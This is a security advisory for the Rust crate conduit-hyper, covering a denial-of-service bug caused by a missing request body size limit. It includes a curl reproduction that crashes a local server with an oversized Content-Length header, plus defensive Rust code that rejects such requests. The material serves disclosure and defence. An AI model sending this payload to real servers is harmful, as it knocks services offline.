A missing request size limit for HTTP requests in conduit-hyper can allow network attackers to perform denial of service
[0.2.0-alpha.3, 0.4.2), fixed in 0.4.2
conduit-hyper did not, by default, set a limit on the size of the request body. A malicious peer could therefore send a request with a very large Content-Length
header (even if the body itself was not very large); the Rust allocator would panic (due to a failed allocation) and the process would crash.
Reproduction steps:
git clone https://github.com/conduit-rust/conduit-hyper
cd conduit-hyper && cargo run --example server
curl -v -X PUT "http://127.0.0.1:12345/" \
  --data `python3 -c "import sys; sys.stdout.write('a'*10000)"` \
  -H "Content-Length: 11111111111111111111"
No mitigations are provided for this vulnerability.
In order to fully fix this vulnerability, we recommend upgrading conduit-hyper to version 0.4.2.
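As an added illustration (not conduit-hyper's own code, which wraps hyper), the defensive pattern that closes this class of bug in plain std Rust: check the declared Content-Length against a limit before allocating anything, and bound the actual read so a body that exceeds the limit is rejected rather than buffered. The limit value, the error type and the function name are assumptions made for this example.

```rust
use std::io::{self, Read};

// Assumed limit for this example; a real server picks it per deployment or route.
pub const MAX_BODY_BYTES: u64 = 1 << 20; // 1 MiB

#[derive(Debug, PartialEq)]
pub enum BodyError {
    TooLarge(u64), // declared Content-Length exceeds the limit; answer 413 before allocating
    BadLength,     // Content-Length is not a valid unsigned integer
    Overflow,      // the stream delivered more bytes than the limit allows
    Io(io::ErrorKind),
}

/// Buffer a request body without trusting Content-Length.
///
/// The vulnerable pattern is `Vec::with_capacity(declared_len)`: a 20-digit header
/// makes that allocation fail and the process dies. Here the declared length is
/// used only as an early-reject check, and the read itself is bounded by `limit`.
pub fn read_body_limited<R: Read>(
    content_length: Option<&str>,
    body: R,
    limit: u64,
) -> Result<Vec<u8>, BodyError> {
    if let Some(raw) = content_length {
        let declared: u64 = raw.trim().parse().map_err(|_| BodyError::BadLength)?;
        if declared > limit {
            return Err(BodyError::TooLarge(declared));
        }
    }
    // Read at most limit + 1 bytes: the extra byte detects an over-long body without
    // buffering it whole, and no capacity is reserved up front from the header value.
    let mut buf = Vec::new();
    body.take(limit.saturating_add(1))
        .read_to_end(&mut buf)
        .map_err(|e| BodyError::Io(e.kind()))?;
    if buf.len() as u64 > limit {
        return Err(BodyError::Overflow);
    }
    Ok(buf)
}

fn main() {
    // Constructed input mirroring the advisory: a small body with a huge declared length.
    let body: &[u8] = &[b'a'; 10_000];
    match read_body_limited(Some("11111111111111111111"), body, MAX_BODY_BYTES) {
        Err(BodyError::TooLarge(n)) => println!("rejected: declared {} bytes > limit {}", n, MAX_BODY_BYTES),
        other => println!("unexpected: {:?}", other),
    }
}
```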